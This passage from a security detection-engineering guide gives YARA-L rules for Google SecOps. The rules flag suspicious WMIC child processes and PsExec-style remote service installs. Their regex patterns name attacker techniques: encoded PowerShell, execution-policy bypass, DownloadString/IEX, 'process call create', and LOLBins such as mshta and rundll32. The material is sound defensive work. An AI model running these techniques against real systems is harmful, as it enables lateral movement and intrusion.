
  events:
    $proc.metadata.event_type = "PROCESS_LAUNCH"
    re.regex($proc.principal.process.file.full_path, `(?i)\\wmic\.exe$`)
    (re.regex($proc.target.process.file.full_path, `(?i)\\powershell\.exe$`) or
     re.regex($proc.target.process.file.full_path, `(?i)\\cmd\.exe$`) or
     re.regex($proc.target.process.file.full_path, `(?i)\\rundll32\.exe$`))
    // Suspicious child arguments, or wmic's own launch / remote syntax on the parent.
    (re.regex($proc.target.process.command_line, `(?i)-(enc|ep\s|e\s|ExecutionPolicy\s+Bypass|nop|noni|w\s+hidden)`) or
     re.regex($proc.target.process.command_line, `(?i)(DownloadString|IEX|Invoke-Expression|FromBase64String)`) or
     re.regex($proc.principal.process.command_line, `(?i)(process\s+call\s+create|/node:)`))
    not $proc.principal.hostname in %approved_admin_workstations
    $proc.principal.hostname = $host

  match:
    $host over 10m

  outcome:
    $child_cmds = array_distinct($proc.target.process.command_line)

  condition:
    $proc
}
```
#### Rule 8: Remote Service Install Lateral Movement (PsExec Pattern)

Service creation for lateral movement shows up in two channels: 4697 in the Security log (requires the Security System Extension audit subcategory) and 7045 in the System log. Correlating both catches PsExec, SCShell and custom implants, and the `known_service_accounts` list below keeps sanctioned installers quiet.

```yaral
rule Detect_Remote_Service_Install_Lateral_Movement {
  meta:
    author = "Detection Engineering"
    description = "Service installation via 4697 (Security) or 7045 (System) by an account outside the known service-account list, with the service binary in a user-writable directory or wrapping a script host or encoded command. PsExec-style tools install a service whose image path points at the dropped binary."
    severity = "HIGH"
    mitre_attack = "T1569.002, T1021.002"

  events:
    $svc.metadata.log_type = "WINEVTLOG"
    ($svc.metadata.product_event_type = "4697" or $svc.metadata.product_event_type = "7045")
    // ServiceFileName (4697) / ImagePath (7045), as the parser maps them into the command line.
    (re.regex($svc.target.process.command_line, `(?i)\\(Temp|AppData|ProgramData|PerfLogs|Users\\Public)\\`) or
     re.regex($svc.target.process.command_line, `(?i)\.(exe|dll|ps1|bat|cmd|vbs).*-(enc|e\s|encoded|nop|ep\s|ExecutionPolicy)`) or
     re.regex($svc.target.process.command_line, `(?i)(powershell|cmd\.exe\s+/c|rundll32|regsvr32|mshta)`))
    not $svc.principal.user.userid in %known_service_accounts
    $svc.principal.user.userid = $actor
    // The host that logged the event is the one the service was installed on.
    $svc.principal.hostname = $victim

  match:
    $victim over 10m

  outcome:
    $actors = array_distinct($actor)
    $service_cmd = array_distinct($svc.target.process.command_line)

  condition:
    $svc
}
```
### Reference Lists for On-Premises Rules

Build and maintain these reference lists in SecOps:

| List Name | Type | Purpose | Seed With |
|---|---|---|---|
| `trusted_lsass_accessors` | STRING | Legitimate LSASS-accessing processes | Windows core processes, EDR agents, backup agents |
| `approved_admin_workstations` | STRING | Jump boxes and PAW devices | Output of CMDB query for tier-0 workstations |
| `known_service_accounts` | STRING | Service account SamAccountNames | AD query for accounts with SPNs or non-expiring passwords |
| `approved_remote_admin_tools` | STRING | Sanctioned remote tools | TeamViewer, AnyDesk, Splashtop (if approved) |
## Summary: On-Premises Detection
✅ Understand AD event IDs and Kerberos attack patterns
✅ Know Sysmon events for process, file, registry, and network telemetry
✅ Master field mappings for robust cross-source rules
✅ Deploy production-grade rules: Kerberos, DCSync, LSASS, WMI, WMIC
✅ Maintain reference lists to reduce false positives
**Next**: Part 3 covers cloud detection (Entra ID, O365, Defender), cross-source correlation, and validation strategies.
